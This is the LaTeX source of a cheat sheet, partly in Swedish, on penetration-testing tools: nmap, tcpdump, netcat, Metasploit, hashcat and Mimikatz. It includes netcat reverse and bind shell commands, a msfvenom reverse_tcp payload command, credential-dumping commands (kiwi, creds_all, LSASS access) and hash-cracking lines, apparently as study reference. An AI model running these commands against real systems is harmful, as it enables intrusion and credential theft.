\documentclass[10pt,a4paper]{article} % Packages \usepackage{fancyhdr} % For header and footer \usepackage{multicol} % Allows multicols in tables \usepackage{tabularx} % Intelligent column widths \usepackage{tabulary} % Used in header and footer \usepackage{hhline} % Border under tables \usepackage{graphicx} % For images \usepackage{xcolor} % For hex colours %\usepackage[utf8x]{inputenc} % For unicode character support \usepackage[T1]{fontenc} % Without this we get weird character replacements \usepackage{colortbl} % For coloured tables \usepackage{setspace} % For line height \usepackage{lastpage} % Needed for total page number \usepackage{seqsplit} % Splits long words. %\usepackage{opensans} % Can't make this work so far. Shame. Would be lovely. \usepackage[normalem]{ulem} % For underlining links % Most of the following are not required for the majority % of cheat sheets but are needed for some symbol support. \usepackage{amsmath} % Symbols \usepackage{MnSymbol} % Symbols \usepackage{wasysym} % Symbols %\usepackage[english,german,french,spanish,italian]{babel} % Languages % Document Info \author{unicornfox} \pdfinfo{ /Title (test.pdf) /Creator (Cheatography) /Author (unicornfox) /Subject (Test Cheat Sheet) } % Lengths and widths \addtolength{\textwidth}{6cm} \addtolength{\textheight}{-1cm} \addtolength{\hoffset}{-3cm} \addtolength{\voffset}{-2cm} \setlength{\tabcolsep}{0.2cm} % Space between columns \setlength{\headsep}{-12pt} % Reduce space between header and content \setlength{\headheight}{85pt} % If less, LaTeX automatically increases it \renewcommand{\footrulewidth}{0pt} % Remove footer line \renewcommand{\headrulewidth}{0pt} % Remove header line \renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit % This two commands together give roughly % the right line height in the tables \renewcommand{\arraystretch}{1.3} \onehalfspacing % Commands \newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut 
for row colour \newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols \newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns \newcommand{\tn}{\tabularnewline} % Required as custom column type in use % Font and Colours \definecolor{HeadBackground}{HTML}{333333} \definecolor{FootBackground}{HTML}{666666} \definecolor{TextColor}{HTML}{333333} \definecolor{DarkBackground}{HTML}{363433} \definecolor{LightBackground}{HTML}{F8F8F8} \renewcommand{\familydefault}{\sfdefault} \color{TextColor} % Header and Footer \pagestyle{fancy} \fancyhead{} % Set header to blank \fancyfoot{} % Set footer to blank \fancyhead[L]{ \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{C} \SetRowColor{DarkBackground} \vspace{-7pt} {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}} } \end{tabulary} \columnbreak \begin{tabulary}{11cm}{L} \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{Test Cheat Sheet}}}} \\ \normalsize{by \textcolor{DarkBackground}{unicornfox} via \textcolor{DarkBackground}{\uline{cheatography.com/213883/cs/46571/}}} \end{tabulary} \end{multicols}} \fancyfoot[L]{ \footnotesize \noindent \begin{multicols}{3} \begin{tabulary}{5.8cm}{LL} \SetRowColor{FootBackground} \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}} \\ \vspace{-2pt}unicornfox \\ \uline{cheatography.com/unicornfox} \\ \end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}} \\ \vspace{-2pt}Not Yet Published.\\ Updated 4th July, 2025.\\ Page {\thepage} of \pageref{LastPage}. 
\end{tabulary} \vfill \columnbreak \begin{tabulary}{5.8cm}{L} \SetRowColor{FootBackground} \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}} \\ \SetRowColor{white} \vspace{-5pt} %\includegraphics[width=48px,height=48px]{dave.jpeg} Measure your website readability!\\ www.readability-score.com \end{tabulary} \end{multicols}} \begin{document} \raggedright \raggedcolumns % Set font size to small. Switch to any value % from this page to resize cheat sheet text: % www.emerson.emory.edu/services/latex/latex_169.html \footnotesize % Small font. \begin{multicols*}{2} \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{nmap}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{-sn}} \textless{}ip\textgreater{} & Ping sweep \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{-sT}} \textless{}ip\textgreater{} & TCP full connect scan \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} {\bf{-sS}} \textless{}ip\textgreater{} & TCP SYN half-open (requires root) \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} {\bf{-sU}} \textless{}ip\textgreater{} & UDP scan \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{-sV}} \textless{}ip\textgreater{} & Version scan \tn % Row Count 6 (+ 1) % Row 5 \SetRowColor{white} {\bf{-O}} \textless{}ip\textgreater{} & OS fingerprint \tn % Row Count 7 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{-Pn}} \textless{}ip\textgreater{} & Treat all hosts as online (skip host discovery) \tn % Row Count 10 (+ 3) % Row 7 \SetRowColor{white} {\bf{-sX}} \textless{}ip\textgreater{} & Xmas scan \tn % Row Count 11 (+ 1) % Row 8 \SetRowColor{LightBackground} {\bf{-{}-top-ports=10}} \textless{}ip\textgreater{} & Scan top 10 most common ports \tn % Row Count 13 (+ 2) % Row 9 \SetRowColor{white} \textless{}ip\textgreater{} -sV -Pn {\bf{-{}-reason}} & Add {\bf{-{}-reason}} to show why a port is reported open \tn % Row Count 15 (+ 2) % Row 10 \SetRowColor{LightBackground} 
{\bf{-6}} -sV \textless{}ip\textgreater{} & IPv6 scan \tn % Row Count 16 (+ 1) % Row 11 \SetRowColor{white} {\bf{-sA}} \textless{}ip\textgreater{} & Avoid IDS/IPS firewalls (only sends ACK-flag) \tn % Row Count 19 (+ 3) % Row 12 \SetRowColor{LightBackground} {\bf{-iL}} list-of-ips.txt & Scan from list of IPs \tn % Row Count 21 (+ 2) % Row 13 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Save output to file}} \{\{border=1\}\}} \tn % Row Count 22 (+ 1) % Row 14 \SetRowColor{LightBackground} -oN & Normal output \tn % Row Count 23 (+ 1) % Row 15 \SetRowColor{white} -oX & XML format \tn % Row Count 24 (+ 1) % Row 16 \SetRowColor{LightBackground} -oG & Greppable format \tn % Row Count 25 (+ 1) % Row 17 \SetRowColor{white} -oS & Script kiddie output \tn % Row Count 26 (+ 1) % Row 18 \SetRowColor{LightBackground} -oA & Output in the three useful formats (all but script kiddie) \tn % Row Count 29 (+ 3) % Row 19 \SetRowColor{white} {\emph{-p 0–65535}} eller -{\emph{-all-ports}} & Skanna alla portar (-p- har inte med port 0) \tn % Row Count 32 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.76 cm} x{4.24 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{nmap (cont)}} \tn % Row 20 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Scripts}} \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 21 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln}}} \tn % Row Count 4 (+ 3) % Row 22 \SetRowColor{LightBackground} {\bf{-sC/-{}-script}} & Script scan \tn % Row Count 5 (+ 1) % Row 23 \SetRowColor{white} nmap -{}-script=vuln \textless{}ip\textgreater{} -Pn -n -v & Use {\bf{-{}-script=vuln}} to find vulnerabilities for host \tn % Row Count 8 (+ 3) % Row 24 \SetRowColor{LightBackground} nmap -{}-script-help=http-brute & Find info about script {\bf{http-brute}} \tn % Row Count 10 
(+ 2) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Timing template}} \{\{border=1\}\}} \tn % Row Count 11 (+ 1) % Row 26 \SetRowColor{LightBackground} {\emph{900000ms, 900, 900s, and 15m}} & Time definitions. All mean the same amount of time \tn % Row Count 14 (+ 3) % Row 27 \SetRowColor{white} -T0 & paranoid \tn % Row Count 15 (+ 1) % Row 28 \SetRowColor{LightBackground} -T1 & sneaky \tn % Row Count 16 (+ 1) % Row 29 \SetRowColor{white} -T2 & polite \tn % Row Count 17 (+ 1) % Row 30 \SetRowColor{LightBackground} -T3 & normal (default) \tn % Row Count 18 (+ 1) % Row 31 \SetRowColor{white} -T4 & aggressive \tn % Row Count 19 (+ 1) % Row 32 \SetRowColor{LightBackground} -T5 & insane \tn % Row Count 20 (+ 1) % Row 33 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Delays}} \{\{border=1\}\}} \tn % Row Count 21 (+ 1) % Row 34 \SetRowColor{LightBackground} -{}-host-timeout \textless{}time\textgreater{} & Give up on slow target hosts. Value 0 can be used to mean ``no timeout'' \tn % Row Count 25 (+ 4) % Row 35 \SetRowColor{white} -{}-scan-delay \textless{}time\textgreater{} & Wait \textless{}time\textgreater{} between each probe \tn % Row Count 27 (+ 2) % Row 36 \SetRowColor{LightBackground} -{}-script-timeout \textless{}time\textgreater{} & Sets a ceiling on script execution time. 
\tn % Row Count 29 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{tcpdump}} \tn % Row 0 \SetRowColor{LightBackground} {\bf{-D}} & List all interfaces \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} {\bf{-i}} & Record from specific interface \tn % Row Count 3 (+ 2) % Row 2 \SetRowColor{LightBackground} {\bf{-nn}} & Do not resolve hostnames \tn % Row Count 5 (+ 2) % Row 3 \SetRowColor{white} {\bf{-w}} output.pcap & Write to file \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{-v}} & Verbose \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{EXAMPLE}}} \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} tcpdump -i eth1 & Record traffic from eth1 \tn % Row Count 10 (+ 2) % Row 7 \SetRowColor{white} tcpdump -i eth1 {\bf{-w}} \textasciitilde{}/output.pcap & Write to file \tn % Row Count 12 (+ 2) % Row 8 \SetRowColor{LightBackground} tcpdump -i eth1 {\bf{-r}} \textasciitilde{}/output.pcap & Read from file \tn % Row Count 14 (+ 2) % Row 9 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{FILTER}}} \tn % Row Count 15 (+ 1) % Row 10 \SetRowColor{LightBackground} tcpdump -i eth0 {\bf{host}} 127.0.0.1 & Filter on host 127.0.0.1 using {\bf{host}} \tn % Row Count 17 (+ 2) % Row 11 \SetRowColor{white} tcpdump -i eth0 dst {\bf{net}} 172.16.146.0/24 & Filter on network using {\bf{net}} (and dst) \tn % Row Count 20 (+ 3) % Row 12 \SetRowColor{LightBackground} tcpdump -i eth0 {\bf{portrange}} 0-1024 & Filter on {\bf{portrange}} \tn % Row Count 22 (+ 2) % Row 13 \SetRowColor{white} tcpdump -i eth0 {\bf{port}} 80 & Filter on {\bf{port}} \tn % Row Count 24 (+ 2) % Row 14 \SetRowColor{LightBackground} tcpdump -i eth0 tcp src port 80 & Filter on {\bf{src}} (and port) \tn % Row Count 26 (+ 2) % Row 15 \SetRowColor{white} 
\mymulticolumn{2}{x{8.4cm}}{{\bf{PROTOCOL}}} \tn % Row Count 27 (+ 1) % Row 16 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{ether, ip, ip6, arp, rarp, tcp, udp}}} \tn % Row Count 28 (+ 1) % Row 17 \SetRowColor{white} tcpdump -r sus.pcap {\bf{icmp}} or {\bf{host}} 172.16.146.1 & Filter on protocol {\bf{icmp}} and {\bf{host}} \tn % Row Count 31 (+ 3) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{tcpdump (cont)}} \tn % Row 18 \SetRowColor{LightBackground} tcpdump -r sus.pcap not icmp & Filter NOT on protocol {\bf{icmp}} \tn % Row Count 2 (+ 2) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{Use `and / or` to combine these together} \tn % Row Count 3 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{netcat (nc)}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Flags}} \{\{border=1\}\}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} -l & Listen mode \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} -L & Listen harder --- make a persistent listener \tn % Row Count 4 (+ 2) % Row 3 \SetRowColor{white} -n & Don't resolve names \tn % Row Count 5 (+ 1) % Row 4 \SetRowColor{LightBackground} -z & Zero I/O. Don't send any data \tn % Row Count 7 (+ 2) % Row 5 \SetRowColor{white} -v & Verbose \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} -p & Local port \tn % Row Count 9 (+ 1) % Row 7 \SetRowColor{white} -u & UDP connection \tn % Row Count 10 (+ 1) % Row 8 \SetRowColor{LightBackground} -e & Program to execute after a connection occurs (unsafe, needs to be enabled in some cases. 
Depends on nc-version) \tn % Row Count 15 (+ 5) % Row 9 \SetRowColor{white} -w 10 & Timeout after 10 seconds \tn % Row Count 16 (+ 1) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Examples}} \{\{border=1\}\}} \tn % Row Count 17 (+ 1) % Row 11 \SetRowColor{white} nc -l -p 1337 -e /bin/bash & Open listener \tn % Row Count 19 (+ 2) % Row 12 \SetRowColor{LightBackground} nc -zvn \textless{}ip\textgreater{} \textless{}port\textgreater{} & Use as port scanner \tn % Row Count 21 (+ 2) % Row 13 \SetRowColor{white} nc \textless{}ip\textgreater{} \textless{}port\textgreater{} & Connect to port, e.g.\ a web server \tn % Row Count 23 (+ 2) % Row 14 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{File receiver/sender}} \{\{border=1\}\}} \tn % Row Count 24 (+ 1) % Row 15 \SetRowColor{white} nc -l port \textgreater{} filename & On host: Start file receiver \tn % Row Count 26 (+ 2) % Row 16 \SetRowColor{LightBackground} nc host port \textless{} filename & On client: Send file \tn % Row Count 28 (+ 2) % Row 17 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Reverse Shell (attacker is listener)}} \{\{border=1\}\}} \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{3.12 cm} x{4.88 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{netcat (nc) (cont)}} \tn % Row 18 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{On target machine}}} \tn % Row Count 1 (+ 1) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`nc \textless{}ip\textgreater{} \textless{}port\textgreater{} -e /bin/bash`} \tn % Row Count 2 (+ 1) % Row 20 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{On attacking machine}}} \tn % Row Count 3 (+ 1) % Row 21 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{`nc -lvnp \textless{}port\textgreater{}`} \tn % Row Count 4 (+ 1) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Bind Shell (victim 
is listener)}} \{\{border=1\}\}} \tn % Row Count 5 (+ 1) % Row 23 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{On target machine}}} \tn % Row Count 6 (+ 1) % Row 24 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`nc -lvnp \textless{}port\textgreater{} -e /bin/bash`} \tn % Row Count 7 (+ 1) % Row 25 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\emph{On attacking machine}}} \tn % Row Count 8 (+ 1) % Row 26 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`nc -nv \textless{}ip\textgreater{} \textless{}port\textgreater{}`} \tn % Row Count 9 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MODULES}}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} Auxiliary & Verktygsmoduler f{\"o}r scanning, fuzzing, bruteforce, sniffning \tn % Row Count 5 (+ 4) % Row 2 \SetRowColor{LightBackground} Encoders & Kodar payloads f{\"o}r att undvika antivirus \tn % Row Count 8 (+ 3) % Row 3 \SetRowColor{white} Exploits & Utnyttjar en sårbarhet i mål (t.ex. buffer overflow, RCE) \tn % Row Count 11 (+ 3) % Row 4 \SetRowColor{LightBackground} NOPs & (No Operation code) anv{\"a}nds f{\"o}r padding i exploits \tn % Row Count 14 (+ 3) % Row 5 \SetRowColor{white} Payloads & Kod som k{\"o}rs efter en exploit (t.ex. reverse shell) \tn % Row Count 17 (+ 3) % Row 6 \SetRowColor{LightBackground} Plugins & Additional scripts can be integrated within an assessment \seqsplit{with msfconsole and} coexist. \tn % Row Count 22 (+ 5) % Row 7 \SetRowColor{white} Post & Anv{\"a}nds efter access, f{\"o}r enum, dump, persistence \tn % Row Count 25 (+ 3) % Row 8 \SetRowColor{LightBackground} Evasion & Designade f{\"o}r att undvika AV/EDR, t.ex. 
via obfuskering \tn % Row Count 28 (+ 3) % Row 9 \SetRowColor{white} \seqsplit{Exploit/multi/handler} & Ta emot en payload (lyssnare) \tn % Row Count 30 (+ 2) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 10 \SetRowColor{LightBackground} {\bf{{\emph{\textless{}modultyp\textgreater{}/\textless{}plattform\textgreater{}/\textless{}kategori\textgreater{}/\textless{}namn\textgreater{}}}}} & Exploit/modul format (exploit, auxiliary, post ) \tn % Row Count 3 (+ 3) % Row 11 \SetRowColor{white} {\bf{{\emph{\textless{}payloadtyp\textgreater{}/\textless{}plattform\textgreater{}/\textless{}funktion\textgreater{}}}}} & Payload format (windows, linux, cmd) \tn % Row Count 6 (+ 3) % Row 12 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ API }}} \tn % Row Count 7 (+ 1) % Row 13 \SetRowColor{white} {\bf{ load extapi }} & Extended API (måste laddas manuellt) \tn % Row Count 9 (+ 2) % Row 14 \SetRowColor{LightBackground} stdapi & Standard-API (laddas automatiskt) \tn % Row Count 11 (+ 2) % Row 15 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MISC }}} \tn % Row Count 12 (+ 1) % Row 16 \SetRowColor{LightBackground} smart\_hashdump & V{\"a}ljer smart/automatiskt vilka hashar att dumpa (lokalt eller dom{\"a}n) \tn % Row Count 16 (+ 4) % Row 17 \SetRowColor{white} search name:mysql & Search exploits (mysql) \tn % Row Count 18 (+ 2) % Row 18 \SetRowColor{LightBackground} search cve:2011 author:jduck platform:linux & Search exploit \tn % Row Count 21 (+ 3) % Row 19 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ PAYLOADTYPER}}} \tn % Row Count 22 (+ 1) % Row 20 \SetRowColor{LightBackground} reverse\_tcp & Offret ansluter tillbaka till attackeraren via TCP \tn % Row Count 25 (+ 3) % Row 21 \SetRowColor{white} bind\_tcp & Offret har lyssnare på en port, 
som attackerare utnyttjar och ansluter in på \tn % Row Count 29 (+ 4) % Row 22 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ METERPRETER}}} \tn % Row Count 30 (+ 1) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 23 \SetRowColor{LightBackground} {\bf{migrate \textless{}psId\textgreater{}}} & Migrera till en stabilare process tex winlogon.exe (beh{\"o}ver k{\"o}ra ps) \tn % Row Count 4 (+ 4) % Row 24 \SetRowColor{white} {\bf{load kiwi}} & Mimikatz från meterpreter \tn % Row Count 6 (+ 2) % Row 25 \SetRowColor{LightBackground} {\bf{creds\_all}} & Dumpa alla creds (kiwi) \tn % Row Count 8 (+ 2) % Row 26 \SetRowColor{white} {\bf{creds\_kerberos}} & se TGT/TGS (kiwi) \tn % Row Count 9 (+ 1) % Row 27 \SetRowColor{LightBackground} {\bf{route add 10.1.10.5 1}} & Routa trafik via en host och session (1) \tn % Row Count 11 (+ 2) % Row 28 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{\{\{border=1\}\} {\bf{ MSFVENOM }}} \tn % Row Count 12 (+ 1) % Row 29 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{skapa payloads och exploits i olika format – t.ex. 
.exe, .ps1, .apk, .asp, .dll}}} \tn % Row Count 14 (+ 2) % Row 30 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{msfvenom -p \seqsplit{windows/meterpreter/reverse\_tcp} LHOST=10.10.14.25 LPORT=4444 -f exe -o payload.exe}}} \tn % Row Count 16 (+ 2) % Row 31 \SetRowColor{LightBackground} -p & Payloadtyp \tn % Row Count 17 (+ 1) % Row 32 \SetRowColor{white} -f & Format \tn % Row Count 18 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{LINUX}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4.24 cm} x{3.76 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Crontab}} \tn % Row 0 \SetRowColor{LightBackground} crontab -l & List jobs \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} crontab -e & Edit jobs \tn % Row Count 2 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{`* * * * * /home/user/script.sh`} \tn % Row Count 3 (+ 1) % Row 3 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Min}} {\emph{Hour}} {\bf{Day(Month,1-31)}} {\emph{Month}} {\bf{Day(Week, 0-6)}}} \tn % Row Count 5 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{2.48 cm} x{5.52 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{MISC}} \tn % Row 0 \SetRowColor{LightBackground} \seqsplit{/etc/nsswitch}.conf & Styr i vilken ordning Linux-systemet slår upp information om anv{\"a}ndare, grupper, och namn – t.ex. via filer, DNS eller LDAP. 
\tn % Row Count 5 (+ 5) % Row 1 \SetRowColor{white} getent shadow & Lista shadow (kr{\"a}ver root) \tn % Row Count 7 (+ 2) % Row 2 \SetRowColor{LightBackground} getent passwd & Lista passwd \tn % Row Count 9 (+ 2) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{p{0.8 cm} p{0.8 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{PASSWORD}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{5.36 cm} x{2.64 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{/etc/shadow}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{sai:\$6\${\bf{YTJ7JKnfsB4esnbS\$}}5XvmYk2.GXVWhDo2TYGN2hCitD/wU9Kov.uZD8xsnleuf1r0ARX3qodIKiDsdoQA444b8IMPMOnUWDmVJVkeg1:19446:0:99999:7:::} \tn % Row Count 3 (+ 3) % Row 1 \SetRowColor{white} YTJ7JKnfsB4esnbS & salt \tn % Row Count 4 (+ 1) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\bf{Password hashes}}} \tn % Row Count 5 (+ 1) % Row 3 \SetRowColor{white} {\bf{\$1\$ }} & MD5 \tn % Row Count 6 (+ 1) % Row 4 \SetRowColor{LightBackground} {\bf{\$2\$ }} & Blowfish \tn % Row Count 7 (+ 1) % Row 5 \SetRowColor{white} {\bf{\$2y\$ }} & Blowfish \tn % Row Count 8 (+ 1) % Row 6 \SetRowColor{LightBackground} {\bf{\$5\$ }} & SHA-256 \tn % Row Count 9 (+ 1) % Row 7 \SetRowColor{white} {\bf{\$6\$ }} & SHA-512 \tn % Row Count 10 (+ 1) % Row 8 \SetRowColor{LightBackground} {\bf{\$y\$ }} & yescrypt \tn % Row Count 11 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{4 cm} x{4 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Hashcat}} \tn % Row 0 \SetRowColor{LightBackground} hashcat -a 0 -m 16500 \textless{}jwt\textgreater{} 
\textless{}wordlist\textgreater{} & Crack JWT \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} hashcat -m 1800 -a 0 -o found1.txt crack1.hash 500\_passwords.txt & Crack Linux SHA512crypt password with a dictionary \tn % Row Count 6 (+ 4) % Row 2 \SetRowColor{LightBackground} hashcat -{}-force -m 13100 -a 0 lab3.hashcat /path/to/Dict.txt -{}-show & Crack Kerberos Service Ticket for account password \tn % Row Count 10 (+ 4) % Row 3 \SetRowColor{white} {\bf{-a}} & Attack mode (0=dictionary, 3=brute force) \tn % Row Count 12 (+ 2) % Row 4 \SetRowColor{LightBackground} {\bf{-m}} & Hash-type \tn % Row Count 13 (+ 1) % Row 5 \SetRowColor{white} \mymulticolumn{2}{x{8.4cm}}{{\bf{Hash types}}} \tn % Row Count 14 (+ 1) % Row 6 \SetRowColor{LightBackground} -m 0 & MD5 \tn % Row Count 15 (+ 1) % Row 7 \SetRowColor{white} -m 100 & SHA1 \tn % Row Count 16 (+ 1) % Row 8 \SetRowColor{LightBackground} -m 1000 & NTLM \tn % Row Count 17 (+ 1) % Row 9 \SetRowColor{white} -m 1800 & SHA512crypt \tn % Row Count 18 (+ 1) % Row 10 \SetRowColor{LightBackground} -m 3000 & LM \tn % Row Count 19 (+ 1) % Row 11 \SetRowColor{white} -m 5600 & NetNTLMv2 \tn % Row Count 20 (+ 1) % Row 12 \SetRowColor{LightBackground} -m 13100 & Kerberos \tn % Row Count 21 (+ 1) % Row 13 \SetRowColor{white} -m 16500 & JWT \tn % Row Count 22 (+ 1) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{8.4cm}{x{3.28 cm} x{4.72 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{8.4cm}}{\bf\textcolor{white}{Mimikatz}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{2}{x{8.4cm}}{{\emph{Kr{\"a}ver local admin och tillgång till SYSTEM f{\"o}r att få ut något intressant}}} \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} {\bf{privilege::debug}} & Ge Mimikatz r{\"a}ttigheter att l{\"a}sa LSASS-processminnet \tn % Row Count 5 (+ 3) % Row 2 \SetRowColor{LightBackground} {\bf{token::elevate}} & Bli SYSTEM (kr{\"a}vs f{\"o}r att l{\"a}sa LSASS) \tn % Row Count 7 (+ 2) % Row 3 
